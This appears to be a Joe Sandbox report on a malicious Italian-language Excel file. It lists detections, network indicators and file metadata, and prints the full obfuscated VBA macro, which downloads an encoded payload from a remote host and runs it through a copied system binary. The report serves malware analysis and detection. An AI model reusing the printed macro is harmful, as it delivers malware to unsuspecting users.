Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xls.xls

Overview

General Information

Sample Name:xls.xls
Analysis ID:736957
MD5:109d15a7d33e671ded911d97bc4a15ab
SHA1:c6660d40673400505c70af85dfddc735fa50a39f
SHA256:822d2e533e0537f92fa3ddcbd8cb2a0d7c33ba2ada626e1cae4ecf466ac61e9b
Tags:xls
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Machine Learning detection for sample
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains embedded VBA macros
Potential document exploit detected (unknown TCP traffic)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2080 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: xls.xlsReversingLabs: Detection: 17%
Source: xls.xlsVirustotal: Detection: 39%Perma Link
Source: xls.xlsJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.213.50.111:443
Source: global trafficTCP traffic: 91.213.50.111:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.213.50.111:443
Source: global trafficTCP traffic: 91.213.50.111:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 91.213.50.111:443 -> 192.168.2.22:49171
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 91.213.50.111:443
Source: global trafficTCP traffic: 91.213.50.111:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 91.213.50.111:443
Source: global trafficTCP traffic: 91.213.50.111:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 91.213.50.111:443 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443
Source: global trafficTCP traffic: 91.213.50.111:443 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443
Source: global trafficTCP traffic: 91.213.50.111:443 -> 192.168.2.22:49173
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.213.50.111:443
Source: global trafficTCP traffic: 91.213.50.111:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.213.50.111:443
Source: global trafficTCP traffic: 91.213.50.111:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 91.213.50.111:443 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 91.213.50.111:443
Source: global trafficTCP traffic: 91.213.50.111:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 91.213.50.111:443
Source: global trafficTCP traffic: 91.213.50.111:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 91.213.50.111:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443
Source: global trafficTCP traffic: 91.213.50.111:443 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443
Source: global trafficTCP traffic: 91.213.50.111:443 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443
Source: global trafficDNS query: name: dooxil.com
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443
Source: unknownDNS traffic detected: queries for: dooxil.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443

System Summary

barindex
Source: xls.xlsStream path '_VBA_PROJECT_CUR/VBA/Foglio1' : found possibly 'ADODB.Stream' functions open, read, write
Source: xls.xlsOLE, VBA macro line: riporti = trattasse(scoperte, Shell(riporti))
Source: xls.xlsOLE, VBA macro line: scoperte = aspetteremo(Left(Environ(ammiratrice("A7Uc6oP5mAs31p0Ee0c1", 3)), 20) & ammiratrice("S5r1Yu3n11dIIl7lM87", 1) & "32" & ammiratrice("K60.3EHeNN7x56eO", 4))
Source: VBA code instrumentationOLE, VBA macro: Module Foglio1, Function dimostrargli, String environ: scoperte = aspetteremo(Left(Environ(ammiratrice("A7Uc6oP5mAs31p0Ee0c1", 3)), 20) & ammiratrice("S5r1Yu3n11dIIl7lM87", 1) & "32" & ammiratrice("K60.3EHeNN7x56eO", 4))Name: dimostrargli
Source: xls.xlsStream path '_VBA_PROJECT_CUR/VBA/Foglio1' : found possibly 'XMLHttpRequest' functions response, responsetext, open, send
Source: VBA code instrumentationOLE, VBA macro: Module Foglio1, Function stupidaggine, found possibly 'XMLHttpRequest' functions response, responsetext, open, sendName: stupidaggine
Source: xls.xlsOLE indicator, VBA macros: true
Source: xls.xlsReversingLabs: Detection: 17%
Source: xls.xlsVirustotal: Detection: 39%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR622B.tmpJump to behavior
Source: xls.xlsOLE indicator, Workbook stream: true
Source: classification engineClassification label: mal68.expl.winXLS@1/0@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts41
Scripting
Path InterceptionPath Interception41
Scripting
OS Credential Dumping1
File and Directory Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium2
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts3
Exploitation for Client Execution
Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Non-Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration12
Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
xls.xls17%ReversingLabsWin32.Trojan.Valyria
xls.xls40%VirustotalBrowse
xls.xls100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
dooxil.com0%VirustotalBrowse
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
dooxil.com
91.213.50.111
truefalseunknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
91.213.50.111
dooxil.comunknown
49392ASBAXETNRUfalse
Joe Sandbox Version:36.0.0 Rainbow Opal
Analysis ID:736957
Start date and time:2022-11-03 12:31:28 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 12m 10s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:xls.xls
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:4
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal68.expl.winXLS@1/0@1/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .xls
  • Changed system and user locale, location and keyboard layout to Italian - Italy
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Active Picture Object
  • Active AutoShape Object
  • Max analysis timeout: 600s exceeded, the analysis took too long
  • Exclude process from analysis (whitelisted): dllhost.exe
No simulations
No context
No context
MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
ASBAXETNRUTPUUCk7Xs7.elfGet hashmaliciousBrowse
  • 212.192.8.139
xoWRw93FCT.elfGet hashmaliciousBrowse
  • 212.193.34.12
tqyCetOyhX.elfGet hashmaliciousBrowse
  • 212.196.244.108
PO0585955.xllGet hashmaliciousBrowse
  • 91.213.50.70
PO85858589.xllGet hashmaliciousBrowse
  • 91.213.50.70
http://91.213.50.70/Htcnwiij.bmpGet hashmaliciousBrowse
  • 91.213.50.70
file.exeGet hashmaliciousBrowse
  • 91.213.50.70
znG275dyXi.exeGet hashmaliciousBrowse
  • 91.213.50.70
itMytdNrIB.elfGet hashmaliciousBrowse
  • 212.192.27.89
file.exeGet hashmaliciousBrowse
  • 91.213.50.70
0_202210194007389131.xlsGet hashmaliciousBrowse
  • 91.213.50.73
0_202210194007389131.xlsGet hashmaliciousBrowse
  • 91.213.50.73
3_202210640813657219.xlsGet hashmaliciousBrowse
  • 91.213.50.73
3_202210640813657219.xlsGet hashmaliciousBrowse
  • 91.213.50.73
1_202210473920042668.xlsGet hashmaliciousBrowse
  • 91.213.50.73
3_202210166432631347.xlsGet hashmaliciousBrowse
  • 91.213.50.73
1_202210473920042668.xlsGet hashmaliciousBrowse
  • 91.213.50.73
3_202210166432631347.xlsGet hashmaliciousBrowse
  • 91.213.50.73
32012545.vbsGet hashmaliciousBrowse
  • 91.213.50.74
wl4JZz3E51.exeGet hashmaliciousBrowse
  • 188.119.64.191
No context
No context
No created / dropped files found
File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Enel SpA, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Nov 3 08:32:50 2022, Last Saved Time/Date: Thu Nov 3 08:32:57 2022, Security: 0
Entropy (8bit):5.342866000055418
TrID:
  • Microsoft Excel sheet (30009/1) 78.94%
  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:xls.xls
File size:69120
MD5:109d15a7d33e671ded911d97bc4a15ab
SHA1:c6660d40673400505c70af85dfddc735fa50a39f
SHA256:822d2e533e0537f92fa3ddcbd8cb2a0d7c33ba2ada626e1cae4ecf466ac61e9b
SHA512:1789d8a5381b24d58150eefb1748b7fa7c5c0782acf53796b517f258d178d6175d4e78717fd4a64c206fd0ee9d8b9bd29444ccc1ef35a337b8ad50548146ce30
SSDEEP:1536:JcblYkEIbSkKBEqEXPgsRZmbaoFhZhR0cixIHm0YtjY+N81LobstcIUvcGJ/uW:2blYkEIuPm3fNRZmbaoFhZhR0cixIHmZ
TLSH:E1630969775AC987D6552F364CE6D7E97336BC40AE9B83073104B73E6F7A6C0C902206
File Content Preview:........................>...................................<...................|..............................................................................................................................................................................
Icon Hash:e4eea286a4b4bcb4
Document Type:OLE
Number of OLE Files:1
Has Summary Info:
Application Name:Microsoft Excel
Encrypted Document:False
Contains Word Document Stream:False
Contains Workbook/Book Stream:True
Contains PowerPoint Document Stream:False
Contains Visio Document Stream:False
Contains ObjectPool Stream:False
Flash Objects Count:0
Contains VBA Macros:True
Code Page:1252
Author:
Last Saved By:
Create Time:2022-11-03 08:32:50.891000
Last Saved Time:2022-11-03 08:32:57
Creating Application:
Security:0
Document Code Page:1252
Thumbnail Scaling Desired:False
Company:
Contains Dirty Links:False
Shared Document:False
Changed Hyperlinks:False
Application Version:1048576
General
Stream Path:_VBA_PROJECT_CUR/VBA/Foglio1
VBA File Name:Foglio1.cls
Stream Size:13465
Data ASCII:. . . . . . . . . . # . . . . . . . . # . . # . . - . . . . . . . . . . . . \\ . . # . . . . . . . . . . . . . . . . . p . . . : b r . t L . H . ! . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . = * . p . F L Q 5 0 9 . . . . . . . . . . . . . . . . . . . . . . x . . . . = * . p . F L Q 5 0 9 : b r . t L . H . ! . . . . . M E . . . . . . . . . . . . . . . . . . . . . P . . . . . . [ L . . . . S . . . . . S . . . . > " . . . . . . . . . . . . . . . . . L . . . . . . . . . . . . . . . .
Data Raw:01 16 03 00 06 00 01 00 00 12 23 00 00 e4 00 00 00 88 02 00 00 b2 23 00 00 c0 23 00 00 8c 2d 00 00 00 00 00 00 01 00 00 00 16 b5 2e 5c 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 93 3a 62 72 0b ae 74 4c b8 05 48 1e 97 21 02 8f 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function aspetteremo(traguardo) As Byte()
Dim dorsale() As Byte
Dim sparagli As Integer
sparagli = FreeFile
Open traguardo For Binary Access Read As sparagli
ReDim dorsale(0 To LOF(sparagli) - 1)
Get sparagli, , dorsale
Close sparagli
aspetteremo = dorsale
End Function
Function stupidaggine(ByVal pittore As String) As String
Dim attratto As Object
    Set attratto = CreateObject(ammiratrice("fgyMSXgjkML2u.XjnbvMLHyuigTTllcPfds", 6))
    attratto.Open ammiratrice("vbGtcrEkbvT", 6), pittore, False
    attratto.send
    stupidaggine = Replace(RTrim(attratto.responseText), " ", "AA")
    Set attratto = Nothing
End Function
Function lasciatela()
lasciatela = Application.DefaultFilePath
End Function
Function dimostrargli(celebrita)
Dim scoperte() As Byte
scoperte = aspetteremo(Left(Environ(ammiratrice("A7Uc6oP5mAs31p0Ee0c1", 3)), 20) & ammiratrice("S5r1Yu3n11dIIl7lM87", 1) & "32" & ammiratrice("K60.3EHeNN7x56eO", 4))
frequenta = lasciatela & ammiratrice("O0I01\1VcNBaJ8l0c500.2CCeYxZ190Ke88", 1)
Debug.Print trattasse(scoperte, frequenta)
riporti = frequenta & " " & celebrita & ",#" & 1 & " /q"
riporti = trattasse(scoperte, Shell(riporti))
End Function
Public Function trattasse(benefici() As Byte, ByVal impiego As String)
    Dim improvvisa As Long: improvvisa = FreeFile
    Open impiego For Binary Access Write As improvvisa
    Put improvvisa, 1, benefici
    Close improvvisa
End Function

Function ammiratrice(stabilizzare, d) As String
Dim perseveranza()
ReDim perseveranza(Len(stabilizzare))
For manna = 1 To UBound(perseveranza)
  perseveranza(manna) = Mid(stabilizzare, manna, 1)
Next
For Each litigata In perseveranza
If d < 5 And litigata = LCase(litigata) And Not IsNumeric(litigata) Then
morivano = morivano & litigata
Else
If d > 5 And litigata = UCase(litigata) Then morivano = morivano & litigata
End If
Next
ammiratrice = morivano
End Function
Sub new_espandere()
scomparendo = dimostrargli(neurologo)
End Sub

Function neurologo() As String
valletto = lasciatela & "\" & Int(89573453 * Rnd) + 6880 & "."
trattasse rientrando((Presentava(ammiratrice("N5h13tDtKQpLL21sE0O:XM1/A40/R1d901oo24xIilR1.23cPRoC5m8", 3)))), valletto
neurologo = valletto
End Function
Function Presentava(ByVal dimagrire As String) As String
Dim Wdimagrire As String
Wdimagrire = dimagrire
Presentava = stupidaggine(Wdimagrire)
End Function
Public Function rientrando(ByVal baciarlo As String) As Byte()
    With CreateObject(ammiratrice("9800m4WsYYxA8m66l", 2) & 2 & ammiratrice("74327.Ad700o67mAEdoKcu3Om55eKn55t", 4)).createElement(ammiratrice("3WEb0", 3) & 64)
        .DataType = ammiratrice("AbVK5in4W.b1QasY7e", 3) & 64
        c = 78
        .Text = baciarlo
        foh = 9
        rientrando = .nodeTypedValue
    End With
End Function



General
Stream Path:_VBA_PROJECT_CUR/VBA/Questa_cartella_di_lavoro
VBA File Name:Questa_cartella_di_lavoro.cls
Stream Size:1203
Data ASCII:. . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . r . . # . . . . . . . . . . . . . . . . . p . . . F j . ~ D ] i . . F . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . ' 9 . $ . D . ] x . . . . . . . . . . . . . . . . . . . . . . . x . . . . ' 9 . $ . D . ] x . F j . ~ D ] i . . F . . . . M E . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . 6 " . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0 . 0 . 0
Data Raw:01 16 03 00 06 00 01 00 00 5a 03 00 00 e4 00 00 00 10 02 00 00 88 03 00 00 96 03 00 00 ea 03 00 00 00 00 00 00 01 00 00 00 16 b5 86 72 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 46 eb f7 a2 6a 1d 7e 44 96 5d 69 02 99 1e cd 46 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

General
Stream Path:\x1CompObj
File Type:data
Stream Size:117
Entropy:4.295052233063858
Base64 Encoded:True
Data ASCII:. . . . . . . . . . . . . . . . . . . F ) . . . F o g l i o d i l a v o r o d i M i c r o s o f t E x c e l 2 0 0 3 . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 29 00 00 00 46 6f 67 6c 69 6f 20 64 69 20 6c 61 76 6f 72 6f 20 64 69 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
General
Stream Path:\x5DocumentSummaryInformation
File Type:data
Stream Size:256
Entropy:2.843729876697485
Base64 Encoded:True
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . o t t - n o v . 2 0 2 2 . . . . . . . . . . . . . . . . . F o g l i d i l a v o r o . . . . . . . . . . . .
Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d0 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a5 00 00 00
General
Stream Path:\x5SummaryInformation
File Type:data
Stream Size:208
Entropy:3.4571641941803213
Base64 Encoded:False
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . H . . . . . . . T . . . . . . . l . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . E ^ . @ . . . B ^ . . . . . . . . . . . . . . . . . E n e l S p A . . . .
Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 8c 00 00 00 08 00 00 00 48 00 00 00 12 00 00 00 54 00 00 00 0c 00 00 00 6c 00 00 00 0d 00 00 00 78 00 00 00 13 00 00 00 84 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
General
Stream Path:Workbook
File Type:Applesoft BASIC program data, first line number 16
Stream Size:28945
Entropy:6.62615417319298
Base64 Encoded:True
Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . Q u e s t a _ c a r t e l l a _ d i _ l a v o r o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . C . # 8 . . . . . . . X . @ . . .
Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
General
Stream Path:_VBA_PROJECT_CUR/PROJECT
File Type:ASCII text, with CRLF line terminators
Stream Size:521
Entropy:5.248358244801769
Base64 Encoded:True
Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = Q u e s t a _ c a r t e l l a _ d i _ l a v o r o / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = F o g l i o 1 / & H 0 0 0 0 0 0 0 0 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C C C E 6 0 F E 6 0 8 6 6 4 8 6 6 4 8 2 6 8 8 2 6 8 " . . D P B = " 5 0 5 2 F C E 3 1 9 E 3
Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 46 6f 67 6c 69 6f 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 48 65 6c 70 46 69 6c
